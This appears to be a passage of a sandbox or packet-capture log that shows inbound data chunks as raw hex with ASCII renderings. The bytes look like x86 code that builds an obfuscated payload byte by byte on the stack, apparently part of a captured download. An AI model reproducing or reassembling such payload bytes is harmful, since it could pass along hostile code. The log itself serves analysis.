2022-05-16 08:29:53 UTC	1981	IN	Data Raw: f7 ff fe c6 85 8d 5c f7 ff 6a c6 85 8e 5c f7 ff 8c c6 85 8f 5c f7 ff 5a c6 85 90 5c f7 ff c4 c6 85 91 5c f7 ff 19 c6 85 92 5c f7 ff 2c c6 85 93 5c f7 ff af c6 85 94 5c f7 ff 7f c6 85 95 5c f7 ff 30 c6 85 96 5c f7 ff 65 c6 85 97 5c f7 ff 6c c6 85 98 5c f7 ff 39 c6 85 99 5c f7 ff d9 c6 85 9a 5c f7 ff f1 c6 85 9b 5c f7 ff a5 c6 85 9c 5c f7 ff 30 c6 85 9d 5c f7 ff 96 c6 85 9e 5c f7 ff ee c6 85 9f 5c f7 ff d7 c6 85 a0 5c f7 ff 79 c6 85 a1 5c f7 ff bb c6 85 a2 5c f7 ff 64 c6 85 a3 5c f7 ff 37 c6 85 a4 5c f7 ff 33 c6 85 a5 5c f7 ff dd c6 85 a6 5c f7 ff ef c6 85 a7 5c f7 ff 84 c6 85 a8 5c f7 ff 13 c6 85 a9 5c f7 ff aa c6 85 aa 5c f7 ff a8 c6 85 ab 5c f7 ff cf c6 85 ac 5c f7 ff 1e c6 85 ad 5c f7 ff 96 c6 85 ae 5c f7 ff c7 c6 85 af 5c f7 ff 78 c6 85 b0 5c f7 ff 33 Data Ascii: \j\\Z\\\,\\\0\e\l\9\\\\0\\\\y\\d\7\3\\\\\\\\\\\x\3
2022-05-16 08:29:53 UTC	1997	IN	Data Raw: 85 b1 65 f7 ff aa c6 85 b2 65 f7 ff f0 c6 85 b3 65 f7 ff 92 c6 85 b4 65 f7 ff f4 c6 85 b5 65 f7 ff 39 c6 85 b6 65 f7 ff a1 c6 85 b7 65 f7 ff e1 c6 85 b8 65 f7 ff 7b c6 85 b9 65 f7 ff ac c6 85 ba 65 f7 ff 03 c6 85 bb 65 f7 ff 92 c6 85 bc 65 f7 ff 77 c6 85 bd 65 f7 ff e8 c6 85 be 65 f7 ff f0 c6 85 bf 65 f7 ff 30 c6 85 c0 65 f7 ff 78 c6 85 c1 65 f7 ff 0e c6 85 c2 65 f7 ff bc c6 85 c3 65 f7 ff e1 c6 85 c4 65 f7 ff ca c6 85 c5 65 f7 ff 0e c6 85 c6 65 f7 ff 34 c6 85 c7 65 f7 ff 56 c6 85 c8 65 f7 ff af c6 85 c9 65 f7 ff e8 c6 85 ca 65 f7 ff bc c6 85 cb 65 f7 ff 30 c6 85 cc 65 f7 ff c3 c6 85 cd 65 f7 ff 5f c6 85 ce 65 f7 ff bc c6 85 cf 65 f7 ff b8 c6 85 d0 65 f7 ff 79 c6 85 d1 65 f7 ff e8 c6 85 d2 65 f7 ff 52 c6 85 d3 65 f7 ff 56 c6 85 d4 65 f7 ff c0 c6 85 d5 65 Data Ascii: eeeee9eee{eeeeweee0exeeeeee4eVeeee0ee_eeeyeeReVee
2022-05-16 08:29:53 UTC	2013	IN	Data Raw: ff b8 c6 85 d6 6e f7 ff 98 c6 85 d7 6e f7 ff 30 c6 85 d8 6e f7 ff 39 c6 85 d9 6e f7 ff f4 c6 85 da 6e f7 ff df c6 85 db 6e f7 ff 00 c6 85 dc 6e f7 ff d4 c6 85 dd 6e f7 ff 92 c6 85 de 6e f7 ff 90 c6 85 df 6e f7 ff 92 c6 85 e0 6e f7 ff c0 c6 85 e1 6e f7 ff e1 c6 85 e2 6e f7 ff 05 c6 85 e3 6e f7 ff 07 c6 85 e4 6e f7 ff 73 c6 85 e5 6e f7 ff 92 c6 85 e6 6e f7 ff 08 c6 85 e7 6e f7 ff 43 c6 85 e8 6e f7 ff dd c6 85 e9 6e f7 ff 30 c6 85 ea 6e f7 ff 76 c6 85 eb 6e f7 ff a5 c6 85 ec 6e f7 ff 85 c6 85 ed 6e f7 ff e1 c6 85 ee 6e f7 ff c9 c6 85 ef 6e f7 ff a5 c6 85 f0 6e f7 ff 10 c6 85 f1 6e f7 ff 56 c6 85 f2 6e f7 ff 99 c6 85 f3 6e f7 ff 43 c6 85 f4 6e f7 ff 96 c6 85 f5 6e f7 ff 30 c6 85 f6 6e f7 ff c3 c6 85 f7 6e f7 ff f4 c6 85 f8 6e f7 ff b8 c6 85 f9 6e f7 ff b8 c6 Data Ascii: nn0n9nnnnnnnnnnnnsnnnCnn0nvnnnnnnnVnnCnn0nnnn
2022-05-16 08:29:53 UTC	2029	IN	Data Raw: fa 77 f7 ff 22 c6 85 fb 77 f7 ff 30 c6 85 fc 77 f7 ff 85 c6 85 fd 77 f7 ff 69 c6 85 fe 77 f7 ff ce c6 85 ff 77 f7 ff b8 c6 85 00 78 f7 ff 82 c6 85 01 78 f7 ff 30 c6 85 02 78 f7 ff 69 c6 85 03 78 f7 ff f4 c6 85 04 78 f7 ff 84 c6 85 05 78 f7 ff 00 c6 85 06 78 f7 ff 8c c6 85 07 78 f7 ff 92 c6 85 08 78 f7 ff 80 c6 85 09 78 f7 ff 92 c6 85 0a 78 f7 ff 8d c6 85 0b 78 f7 ff e1 c6 85 0c 78 f7 ff 00 c6 85 0d 78 f7 ff 07 c6 85 0e 78 f7 ff 2e c6 85 0f 78 f7 ff 92 c6 85 10 78 f7 ff 49 c6 85 11 78 f7 ff 43 c6 85 12 78 f7 ff c9 c6 85 13 78 f7 ff 30 c6 85 14 78 f7 ff 6b c6 85 15 78 f7 ff a5 c6 85 16 78 f7 ff 98 c6 85 17 78 f7 ff e1 c6 85 18 78 f7 ff 82 c6 85 19 78 f7 ff a5 c6 85 1a 78 f7 ff 51 c6 85 1b 78 f7 ff 56 c6 85 1c 78 f7 ff 8d c6 85 1d 78 f7 ff 43 c6 85 1e 78 f7 Data Ascii: w"w0wwiwwxx0xixxxxxxxxxxxx.xxIxCxx0xkxxxxxxQxVxxCx
2022-05-16 08:29:53 UTC	2045	IN	Data Raw: b8 c6 85 1f 81 f7 ff b8 c6 85 20 81 f7 ff 69 c6 85 21 81 f7 ff 36 c6 85 22 81 f7 ff 3b c6 85 23 81 f7 ff 34 c6 85 24 81 f7 ff 33 c6 85 25 81 f7 ff 42 c6 85 26 81 f7 ff c1 c6 85 27 81 f7 ff 05 c6 85 28 81 f7 ff 9d c6 85 29 81 f7 ff cc c6 85 2a 81 f7 ff dd c6 85 2b 81 f7 ff 42 c6 85 2c 81 f7 ff 66 c6 85 2d 81 f7 ff 98 c6 85 2e 81 f7 ff e1 c6 85 2f 81 f7 ff 00 c6 85 30 81 f7 ff d3 c6 85 31 81 f7 ff c9 c6 85 32 81 f7 ff d3 c6 85 33 81 f7 ff 92 c6 85 34 81 f7 ff 82 c6 85 35 81 f7 ff 9a c6 85 36 81 f7 ff 4e c6 85 37 81 f7 ff 07 c6 85 38 81 f7 ff 20 c6 85 39 81 f7 ff cf c6 85 3a 81 f7 ff 4e c6 85 3b 81 f7 ff 43 c6 85 3c 81 f7 ff d3 c6 85 3d 81 f7 ff 4d c6 85 3e 81 f7 ff 71 c6 85 3f 81 f7 ff a5 c6 85 40 81 f7 ff 9f c6 85 41 81 f7 ff db c6 85 42 81 f7 ff d3 c6 85 Data Ascii: i!6";#4$3%B&'()*+B,f-./0123456N78 9:N;C<=M>q?@AB
2022-05-16 08:29:53 UTC	2061	IN	Data Raw: 8a f7 ff 2a c6 85 44 8a f7 ff d6 c6 85 45 8a f7 ff 57 c6 85 46 8a f7 ff 9f c6 85 47 8a f7 ff d4 c6 85 48 8a f7 ff db c6 85 49 8a f7 ff d7 c6 85 4a 8a f7 ff 69 c6 85 4b 8a f7 ff 37 c6 85 4c 8a f7 ff 24 c6 85 4d 8a f7 ff 39 c6 85 4e 8a f7 ff 3a c6 85 4f 8a f7 ff 10 c6 85 50 8a f7 ff 82 c6 85 51 8a f7 ff 01 c6 85 52 8a f7 ff 95 c6 85 53 8a f7 ff ca c6 85 54 8a f7 ff d9 c6 85 55 8a f7 ff 53 c6 85 56 8a f7 ff 73 c6 85 57 8a f7 ff 91 c6 85 58 8a f7 ff 93 c6 85 59 8a f7 ff 20 c6 85 5a 8a f7 ff a1 c6 85 5b 8a f7 ff b9 c6 85 5c 8a f7 ff c4 c6 85 5d 8a f7 ff a2 c6 85 5e 8a f7 ff 94 c6 85 5f 8a f7 ff d1 c6 85 60 8a f7 ff 49 c6 85 61 8a f7 ff 2f c6 85 62 8a f7 ff 43 c6 85 63 8a f7 ff de c6 85 64 8a f7 ff 2c c6 85 65 8a f7 ff 6a c6 85 66 8a f7 ff d4 c6 85 67 8a f7 ff Data Ascii: *DEWFGHIJiK7L$M9N:OPQRSTUSVsWXY Z[\]^_`Ia/bCcd,ejfg
2022-05-16 08:29:53 UTC	2077	IN	Data Raw: c6 85 68 93 f7 ff ab c6 85 69 93 f7 ff a5 c6 85 6a 93 f7 ff 5b c6 85 6b 93 f7 ff 56 c6 85 6c 93 f7 ff 84 c6 85 6d 93 f7 ff 43 c6 85 6e 93 f7 ff dd c6 85 6f 93 f7 ff 30 c6 85 70 93 f7 ff d5 c6 85 71 93 f7 ff f4 c6 85 72 93 f7 ff e7 c6 85 73 93 f7 ff b8 c6 85 74 93 f7 ff 74 c6 85 75 93 f7 ff 43 c6 85 76 93 f7 ff 22 c6 85 77 93 f7 ff 56 c6 85 78 93 f7 ff 37 c6 85 79 93 f7 ff 30 c6 85 7a 93 f7 ff 82 c6 85 7b 93 f7 ff 69 c6 85 7c 93 f7 ff 9f c6 85 7d 93 f7 ff b8 c6 85 7e 93 f7 ff 96 c6 85 7f 93 f7 ff 30 c6 85 80 93 f7 ff 62 c6 85 81 93 f7 ff f4 c6 85 82 93 f7 ff 8c c6 85 83 93 f7 ff 00 c6 85 84 93 f7 ff 84 c6 85 85 93 f7 ff 92 c6 85 86 93 f7 ff 80 c6 85 87 93 f7 ff 92 c6 85 88 93 f7 ff dc c6 85 89 93 f7 ff e1 c6 85 8a 93 f7 ff 41 c6 85 8b 93 f7 ff 07 c6 85 8c Data Ascii: hij[kVlmCno0pqrsttuCv"wVx7y0z{i\|}~0bA
2022-05-16 08:29:53 UTC	2093	IN	Data Raw: f7 ff d4 c6 85 8d 9c f7 ff 53 c6 85 8e 9c f7 ff 39 c6 85 8f 9c f7 ff cb c6 85 90 9c f7 ff cb c6 85 91 9c f7 ff 95 c6 85 92 9c f7 ff 86 c6 85 93 9c f7 ff d0 c6 85 94 9c f7 ff 53 c6 85 95 9c f7 ff 22 c6 85 96 9c f7 ff 8e c6 85 97 9c f7 ff 31 c6 85 98 9c f7 ff 98 c6 85 99 9c f7 ff 59 c6 85 9a 9c f7 ff d1 c6 85 9b 9c f7 ff 91 c6 85 9c 9c f7 ff ca c6 85 9d 9c f7 ff d9 c6 85 9e 9c f7 ff 73 c6 85 9f 9c f7 ff 2c c6 85 a0 9c f7 ff 24 c6 85 a1 9c f7 ff 71 c6 85 a2 9c f7 ff 56 c6 85 a3 9c f7 ff 30 c6 85 a4 9c f7 ff 81 c6 85 a5 9c f7 ff 1f c6 85 a6 9c f7 ff 91 c6 85 a7 9c f7 ff db c6 85 a8 9c f7 ff cc c6 85 a9 9c f7 ff 5f c6 85 aa 9c f7 ff 75 c6 85 ab 9c f7 ff d4 c6 85 ac 9c f7 ff 97 c6 85 ad 9c f7 ff 62 c6 85 ae 9c f7 ff 95 c6 85 af 9c f7 ff e1 c6 85 b0 9c f7 ff 91 Data Ascii: S9S"1Ys,$qV0_ub
2022-05-16 08:29:53 UTC	2109	IN	Data Raw: 85 b1 a5 f7 ff b2 c6 85 b2 a5 f7 ff b2 c6 85 b3 a5 f7 ff 64 c6 85 b4 a5 f7 ff 67 c6 85 b5 a5 f7 ff d5 c6 85 b6 a5 f7 ff cc c6 85 b7 a5 f7 ff 43 c6 85 b8 a5 f7 ff c7 c6 85 b9 a5 f7 ff 67 c6 85 ba a5 f7 ff f1 c6 85 bb a5 f7 ff 0a c6 85 bc a5 f7 ff 38 c6 85 bd a5 f7 ff 32 c6 85 be a5 f7 ff 1b c6 85 bf a5 f7 ff 09 c6 85 c0 a5 f7 ff 74 c6 85 c1 a5 f7 ff 7c c6 85 c2 a5 f7 ff 80 c6 85 c3 a5 f7 ff 3f c6 85 c4 a5 f7 ff 53 c6 85 c5 a5 f7 ff 47 c6 85 c6 a5 f7 ff 29 c6 85 c7 a5 f7 ff 98 c6 85 c8 a5 f7 ff 13 c6 85 c9 a5 f7 ff 74 c6 85 ca a5 f7 ff 2e c6 85 cb a5 f7 ff 87 c6 85 cc a5 f7 ff 89 c6 85 cd a5 f7 ff 72 c6 85 ce a5 f7 ff 30 c6 85 cf a5 f7 ff a8 c6 85 d0 a5 f7 ff 2a c6 85 d1 a5 f7 ff 9a c6 85 d2 a5 f7 ff 86 c6 85 d3 a5 f7 ff 25 c6 85 d4 a5 f7 ff 50 c6 85 d5 a5 Data Ascii: dgCg82t\|?SG)t.r0*%P
2022-05-16 08:29:53 UTC	2125	IN	Data Raw: ff 92 c6 85 d6 ae f7 ff f4 c6 85 d7 ae f7 ff 92 c6 85 d8 ae f7 ff a5 c6 85 d9 ae f7 ff e1 c6 85 da ae f7 ff 69 c6 85 db ae f7 ff 07 c6 85 dc ae f7 ff 07 c6 85 dd ae f7 ff 92 c6 85 de ae f7 ff 69 c6 85 df ae f7 ff 43 c6 85 e0 ae f7 ff f4 c6 85 e1 ae f7 ff 30 c6 85 e2 ae f7 ff 56 c6 85 e3 ae f7 ff a5 c6 85 e4 ae f7 ff b8 c6 85 e5 ae f7 ff e1 c6 85 e6 ae f7 ff f4 c6 85 e7 ae f7 ff a5 c6 85 e8 ae f7 ff 30 c6 85 e9 ae f7 ff 56 c6 85 ea ae f7 ff e1 c6 85 eb ae f7 ff 43 c6 85 ec ae f7 ff b8 c6 85 ed ae f7 ff 30 c6 85 ee ae f7 ff a5 c6 85 ef ae f7 ff f4 c6 85 f0 ae f7 ff b8 c6 85 f1 ae f7 ff b8 c6 85 f2 ae f7 ff 07 c6 85 f3 ae f7 ff 43 c6 85 f4 ae f7 ff 56 c6 85 f5 ae f7 ff 56 c6 85 f6 ae f7 ff 56 c6 85 f7 ae f7 ff 30 c6 85 f8 ae f7 ff e1 c6 85 f9 ae f7 ff 69 c6 Data Ascii: iiC0V0VC0CVVV0i
2022-05-16 08:29:53 UTC	2141	IN	Data Raw: fa b7 f7 ff ad c6 85 fb b7 f7 ff 5f c6 85 fc b7 f7 ff 4d c6 85 fd b7 f7 ff ad c6 85 fe b7 f7 ff 5a c6 85 ff b7 f7 ff 3d c6 85 00 b8 f7 ff 44 c6 85 01 b8 f7 ff 23 c6 85 02 b8 f7 ff 17 c6 85 03 b8 f7 ff 52 c6 85 04 b8 f7 ff dd c6 85 05 b8 f7 ff b2 c6 85 06 b8 f7 ff b1 c6 85 07 b8 f7 ff 25 c6 85 08 b8 f7 ff d1 c6 85 09 b8 f7 ff fa c6 85 0a b8 f7 ff 4e c6 85 0b b8 f7 ff 8b c6 85 0c b8 f7 ff ea c6 85 0d b8 f7 ff 18 c6 85 0e b8 f7 ff 06 c6 85 0f b8 f7 ff 5e c6 85 10 b8 f7 ff 34 c6 85 11 b8 f7 ff 64 c6 85 12 b8 f7 ff f2 c6 85 13 b8 f7 ff 95 c6 85 14 b8 f7 ff 25 c6 85 15 b8 f7 ff 86 c6 85 16 b8 f7 ff 7e c6 85 17 b8 f7 ff f7 c6 85 18 b8 f7 ff 6d c6 85 19 b8 f7 ff 3d c6 85 1a b8 f7 ff 72 c6 85 1b b8 f7 ff 73 c6 85 1c b8 f7 ff cb c6 85 1d b8 f7 ff 8e c6 85 1e b8 f7 Data Ascii: _MZ=D#R%N^4d%~m=rs
2022-05-16 08:29:53 UTC	2157	IN	Data Raw: cc c6 85 1f c1 f7 ff 69 c6 85 20 c1 f7 ff c5 c6 85 21 c1 f7 ff b8 c6 85 22 c1 f7 ff 95 c6 85 23 c1 f7 ff 30 c6 85 24 c1 f7 ff 36 c6 85 25 c1 f7 ff f4 c6 85 26 c1 f7 ff e1 c6 85 27 c1 f7 ff 00 c6 85 28 c1 f7 ff 95 c6 85 29 c1 f7 ff 92 c6 85 2a c1 f7 ff 84 c6 85 2b c1 f7 ff 92 c6 85 2c c1 f7 ff cc c6 85 2d c1 f7 ff e1 c6 85 2e c1 f7 ff 44 c6 85 2f c1 f7 ff 07 c6 85 30 c1 f7 ff 6a c6 85 31 c1 f7 ff 92 c6 85 32 c1 f7 ff 1a c6 85 33 c1 f7 ff 43 c6 85 34 c1 f7 ff d9 c6 85 35 c1 f7 ff 30 c6 85 36 c1 f7 ff 21 c6 85 37 c1 f7 ff a5 c6 85 38 c1 f7 ff d1 c6 85 39 c1 f7 ff e1 c6 85 3a c1 f7 ff 9a c6 85 3b c1 f7 ff a5 c6 85 3c c1 f7 ff 1d c6 85 3d c1 f7 ff 56 c6 85 3e c1 f7 ff 82 c6 85 3f c1 f7 ff 43 c6 85 40 c1 f7 ff d7 c6 85 41 c1 f7 ff 30 c6 85 42 c1 f7 ff d7 c6 85 Data Ascii: i !"#0$6%&'()*+,-.D/0j123C4506!789:;<=V>?C@A0B
2022-05-16 08:29:53 UTC	2173	IN	Data Raw: ca f7 ff 43 c6 85 44 ca f7 ff 1e c6 85 45 ca f7 ff 3a c6 85 46 ca f7 ff 12 c6 85 47 ca f7 ff 30 c6 85 48 ca f7 ff f8 c6 85 49 ca f7 ff 6d c6 85 4a ca f7 ff f4 c6 85 4b ca f7 ff b8 c6 85 4c ca f7 ff ec c6 85 4d ca f7 ff 5c c6 85 4e ca f7 ff 43 c6 85 4f ca f7 ff f4 c6 85 50 ca f7 ff fb c6 85 51 ca f7 ff 04 c6 85 52 ca f7 ff f4 c6 85 53 ca f7 ff 92 c6 85 54 ca f7 ff 94 c6 85 55 ca f7 ff fe c6 85 56 ca f7 ff e1 c6 85 57 ca f7 ff e1 c6 85 58 ca f7 ff 72 c6 85 59 ca f7 ff 03 c6 85 5a ca f7 ff 07 c6 85 5b ca f7 ff 92 c6 85 5c ca f7 ff 05 c6 85 5d ca f7 ff 2f c6 85 5e ca f7 ff b0 c6 85 5f ca f7 ff 30 c6 85 60 ca f7 ff 4a c6 85 61 ca f7 ff a1 c6 85 62 ca f7 ff b8 c6 85 63 ca f7 ff e1 c6 85 64 ca f7 ff 8c c6 85 65 ca f7 ff c9 c6 85 66 ca f7 ff 74 c6 85 67 ca f7 ff Data Ascii: CDE:FG0HImJKLM\NCOPQRSTUVWXrYZ[\]/^_0`Jabcdeftg
2022-05-16 08:29:53 UTC	2189	IN	Data Raw: c6 85 68 d3 f7 ff eb c6 85 69 d3 f7 ff f4 c6 85 6a d3 f7 ff b8 c6 85 6b d3 f7 ff b8 c6 85 6c d3 f7 ff 60 c6 85 6d d3 f7 ff 43 c6 85 6e d3 f7 ff 23 c6 85 6f d3 f7 ff 56 c6 85 70 d3 f7 ff 7b c6 85 71 d3 f7 ff 30 c6 85 72 d3 f7 ff a8 c6 85 73 d3 f7 ff 69 c6 85 74 d3 f7 ff ba c6 85 75 d3 f7 ff b8 c6 85 76 d3 f7 ff b8 c6 85 77 d3 f7 ff 30 c6 85 78 d3 f7 ff 73 c6 85 79 d3 f7 ff f4 c6 85 7a d3 f7 ff 80 c6 85 7b d3 f7 ff 00 c6 85 7c d3 f7 ff d9 c6 85 7d d3 f7 ff 92 c6 85 7e d3 f7 ff bd c6 85 7f d3 f7 ff 92 c6 85 80 d3 f7 ff eb c6 85 81 d3 f7 ff e1 c6 85 82 d3 f7 ff 69 c6 85 83 d3 f7 ff 07 c6 85 84 d3 f7 ff 73 c6 85 85 d3 f7 ff 92 c6 85 86 d3 f7 ff 0c c6 85 87 d3 f7 ff 43 c6 85 88 d3 f7 ff d9 c6 85 89 d3 f7 ff 30 c6 85 8a d3 f7 ff 1f c6 85 8b d3 f7 ff a5 c6 85 8c Data Ascii: hijkl`mCn#oVp{q0rsituvw0xsyz{\|}~isC0
2022-05-16 08:29:53 UTC	2205	IN	Data Raw: f7 ff 0a c6 85 8d dc f7 ff 56 c6 85 8e dc f7 ff e1 c6 85 8f dc f7 ff 43 c6 85 90 dc f7 ff b8 c6 85 91 dc f7 ff 4f c6 85 92 dc f7 ff e1 c6 85 93 dc f7 ff f4 c6 85 94 dc f7 ff 3a c6 85 95 dc f7 ff b8 c6 85 96 dc f7 ff 07 c6 85 97 dc f7 ff 43 c6 85 98 dc f7 ff ae c6 85 99 dc f7 ff 3f c6 85 9a dc f7 ff 12 c6 85 9b dc f7 ff 30 c6 85 9c dc f7 ff f0 c6 85 9d dc f7 ff 69 c6 85 9e dc f7 ff f4 c6 85 9f dc f7 ff b8 c6 85 a0 dc f7 ff d8 c6 85 a1 dc f7 ff 5b c6 85 a2 dc f7 ff 43 c6 85 a3 dc f7 ff f4 c6 85 a4 dc f7 ff de c6 85 a5 dc f7 ff 00 c6 85 a6 dc f7 ff f4 c6 85 a7 dc f7 ff 92 c6 85 a8 dc f7 ff f8 c6 85 a9 dc f7 ff ed c6 85 aa dc f7 ff e1 c6 85 ab dc f7 ff e1 c6 85 ac dc f7 ff e0 c6 85 ad dc f7 ff 07 c6 85 ae dc f7 ff 07 c6 85 af dc f7 ff 92 c6 85 b0 dc f7 ff 75 Data Ascii: VCO:C?0i[Cu
2022-05-16 08:29:53 UTC	2221	IN	Data Raw: 85 b1 e5 f7 ff a5 c6 85 b2 e5 f7 ff dd c6 85 b3 e5 f7 ff e1 c6 85 b4 e5 f7 ff d9 c6 85 b5 e5 f7 ff a5 c6 85 b6 e5 f7 ff 5e c6 85 b7 e5 f7 ff 56 c6 85 b8 e5 f7 ff 8e c6 85 b9 e5 f7 ff 43 c6 85 ba e5 f7 ff b8 c6 85 bb e5 f7 ff 30 c6 85 bc e5 f7 ff d6 c6 85 bd e5 f7 ff f4 c6 85 be e5 f7 ff dd c6 85 bf e5 f7 ff b8 c6 85 c0 e5 f7 ff 2a c6 85 c1 e5 f7 ff 43 c6 85 c2 e5 f7 ff 25 c6 85 c3 e5 f7 ff 56 c6 85 c4 e5 f7 ff 33 c6 85 c5 e5 f7 ff 30 c6 85 c6 e5 f7 ff e1 c6 85 c7 e5 f7 ff 69 c6 85 c8 e5 f7 ff 87 c6 85 c9 e5 f7 ff b8 c6 85 ca e5 f7 ff d3 c6 85 cb e5 f7 ff 30 c6 85 cc e5 f7 ff 2a c6 85 cd e5 f7 ff f4 c6 85 ce e5 f7 ff 92 c6 85 cf e5 f7 ff 00 c6 85 d0 e5 f7 ff 9f c6 85 d1 e5 f7 ff 92 c6 85 d2 e5 f7 ff f4 c6 85 d3 e5 f7 ff 92 c6 85 d4 e5 f7 ff d6 c6 85 d5 e5 Data Ascii: ^VC0C%V30i0
2022-05-16 08:29:53 UTC	2237	IN	Data Raw: ff 7d c6 85 d6 ee f7 ff 76 c6 85 d7 ee f7 ff 7e c6 85 d8 ee f7 ff f4 c6 85 d9 ee f7 ff 30 c6 85 da ee f7 ff 56 c6 85 db ee f7 ff a5 c6 85 dc ee f7 ff b8 c6 85 dd ee f7 ff 21 c6 85 de ee f7 ff 2f c6 85 df ee f7 ff 9a c6 85 e0 ee f7 ff 30 c6 85 e1 ee f7 ff 56 c6 85 e2 ee f7 ff e1 c6 85 e3 ee f7 ff 43 c6 85 e4 ee f7 ff b8 c6 85 e5 ee f7 ff f0 c6 85 e6 ee f7 ff 7e c6 85 e7 ee f7 ff cb c6 85 e8 ee f7 ff b8 c6 85 e9 ee f7 ff b8 c6 85 ea ee f7 ff 07 c6 85 eb ee f7 ff 43 c6 85 ec ee f7 ff 56 c6 85 ed ee f7 ff 07 c6 85 ee ee f7 ff 8d c6 85 ef ee f7 ff 0f c6 85 f0 ee f7 ff e1 c6 85 f1 ee f7 ff 69 c6 85 f2 ee f7 ff f4 c6 85 f3 ee f7 ff b8 c6 85 f4 ee f7 ff b8 c6 85 f5 ee f7 ff 61 c6 85 f6 ee f7 ff dc c6 85 f7 ee f7 ff cb c6 85 f8 ee f7 ff e1 c6 85 f9 ee f7 ff 00 c6 Data Ascii: }v~0V!/0VC~CVia
2022-05-16 08:29:53 UTC	2253	IN	Data Raw: fa f7 f7 ff 5a c6 85 fb f7 f7 ff 1e c6 85 fc f7 f7 ff 69 c6 85 fd f7 f7 ff 07 c6 85 fe f7 f7 ff 07 c6 85 ff f7 f7 ff 92 c6 85 00 f8 f7 ff 29 c6 85 01 f8 f7 ff 43 c6 85 02 f8 f7 ff f4 c6 85 03 f8 f7 ff 30 c6 85 04 f8 f7 ff c2 c6 85 05 f8 f7 ff 37 c6 85 06 f8 f7 ff fc c6 85 07 f8 f7 ff e1 c6 85 08 f8 f7 ff f4 c6 85 09 f8 f7 ff a5 c6 85 0a f8 f7 ff 30 c6 85 0b f8 f7 ff 56 c6 85 0c f8 f7 ff e1 c6 85 0d f8 f7 ff 43 c6 85 0e f8 f7 ff b8 c6 85 0f f8 f7 ff 30 c6 85 10 f8 f7 ff a5 c6 85 11 f8 f7 ff f4 c6 85 12 f8 f7 ff b8 c6 85 13 f8 f7 ff b8 c6 85 14 f8 f7 ff 2b c6 85 15 f8 f7 ff 2f c6 85 16 f8 f7 ff 1a c6 85 17 f8 f7 ff 56 c6 85 18 f8 f7 ff b2 c6 85 19 f8 f7 ff a2 c6 85 1a f8 f7 ff a5 c6 85 1b f8 f7 ff 69 c6 85 1c f8 f7 ff f4 c6 85 1d f8 f7 ff b8 c6 85 1e f8 f7 Data Ascii: Zi)C070VC0+/Vi
2022-05-16 08:29:53 UTC	2269	IN	Data Raw: 72 c6 85 1f 01 f8 ff 19 c6 85 20 01 f8 ff f6 c6 85 21 01 f8 ff 92 c6 85 22 01 f8 ff f4 c6 85 23 01 f8 ff 92 c6 85 24 01 f8 ff 65 c6 85 25 01 f8 ff 7a c6 85 26 01 f8 ff 2d c6 85 27 01 f8 ff 07 c6 85 28 01 f8 ff 06 c6 85 29 01 f8 ff 92 c6 85 2a 01 f8 ff 69 c6 85 2b 01 f8 ff 43 c6 85 2c 01 f8 ff 24 c6 85 2d 01 f8 ff ab c6 85 2e 01 f8 ff 12 c6 85 2f 01 f8 ff a5 c6 85 30 01 f8 ff b8 c6 85 31 01 f8 ff e1 c6 85 32 01 f8 ff f4 c6 85 33 01 f8 ff a5 c6 85 34 01 f8 ff 30 c6 85 35 01 f8 ff 56 c6 85 36 01 f8 ff e1 c6 85 37 01 f8 ff 43 c6 85 38 01 f8 ff b8 c6 85 39 01 f8 ff 30 c6 85 3a 01 f8 ff a5 c6 85 3b 01 f8 ff f4 c6 85 3c 01 f8 ff b8 c6 85 3d 01 f8 ff b8 c6 85 3e 01 f8 ff 07 c6 85 3f 01 f8 ff 43 c6 85 40 01 f8 ff 56 c6 85 41 01 f8 ff 56 c6 85 42 01 f8 ff 56 c6 85 Data Ascii: r !"#$e%z&-'()*i+C,$-./0123405V67C890:;<=>?C@VAVBV
2022-05-16 08:29:53 UTC	2285	IN	Data Raw: 0a f8 ff b8 c6 85 44 0a f8 ff b8 c6 85 45 0a f8 ff 30 c6 85 46 0a f8 ff 07 c6 85 47 0a f8 ff f4 c6 85 48 0a f8 ff 1f c6 85 49 0a f8 ff ff c6 85 4a 0a f8 ff 0b c6 85 4b 0a f8 ff 6d c6 85 4c 0a f8 ff f4 c6 85 4d 0a f8 ff 92 c6 85 4e 0a f8 ff a5 c6 85 4f 0a f8 ff e1 c6 85 50 0a f8 ff dd c6 85 51 0a f8 ff f8 c6 85 52 0a f8 ff f8 c6 85 53 0a f8 ff 6d c6 85 54 0a f8 ff 69 c6 85 55 0a f8 ff 43 c6 85 56 0a f8 ff f4 c6 85 57 0a f8 ff 30 c6 85 58 0a f8 ff a8 c6 85 59 0a f8 ff 5a c6 85 5a 0a f8 ff 47 c6 85 5b 0a f8 ff 1e c6 85 5c 0a f8 ff f4 c6 85 5d 0a f8 ff a5 c6 85 5e 0a f8 ff 30 c6 85 5f 0a f8 ff 56 c6 85 60 0a f8 ff 15 c6 85 61 0a f8 ff 7b c6 85 62 0a f8 ff fb c6 85 63 0a f8 ff 30 c6 85 64 0a f8 ff a5 c6 85 65 0a f8 ff f4 c6 85 66 0a f8 ff b8 c6 85 67 0a f8 ff Data Ascii: DE0FGHIJKmLMNOPQRSmTiUCVW0XYZZG[\]^0_V`a{bc0defg
2022-05-16 08:29:53 UTC	2301	IN	Data Raw: c6 85 68 13 f8 ff 15 c6 85 69 13 f8 ff 42 c6 85 6a 13 f8 ff 84 c6 85 6b 13 f8 ff 08 c6 85 6c 13 f8 ff 80 c6 85 6d 13 f8 ff dd c6 85 6e 13 f8 ff fe c6 85 6f 13 f8 ff 59 c6 85 70 13 f8 ff 6b c6 85 71 13 f8 ff 91 c6 85 72 13 f8 ff b6 c6 85 73 13 f8 ff 00 c6 85 74 13 f8 ff bb c6 85 75 13 f8 ff 90 c6 85 76 13 f8 ff b3 c6 85 77 13 f8 ff f7 c6 85 78 13 f8 ff d1 c6 85 79 13 f8 ff a7 c6 85 7a 13 f8 ff 00 c6 85 7b 13 f8 ff 6b c6 85 7c 13 f8 ff 62 c6 85 7d 13 f8 ff c1 c6 85 7e 13 f8 ff 00 c6 85 7f 13 f8 ff 39 c6 85 80 13 f8 ff 91 c6 85 81 13 f8 ff 75 c6 85 82 13 f8 ff 2e c6 85 83 13 f8 ff a5 c6 85 84 13 f8 ff 9d c6 85 85 13 f8 ff e4 c6 85 86 13 f8 ff a7 c6 85 87 13 f8 ff c0 c6 85 88 13 f8 ff 44 c6 85 89 13 f8 ff 10 c6 85 8a 13 f8 ff 88 c6 85 8b 13 f8 ff 2f c6 85 8c Data Ascii: hiBjklmnoYpkqrstuvwxyz{k\|b}~9u.D/
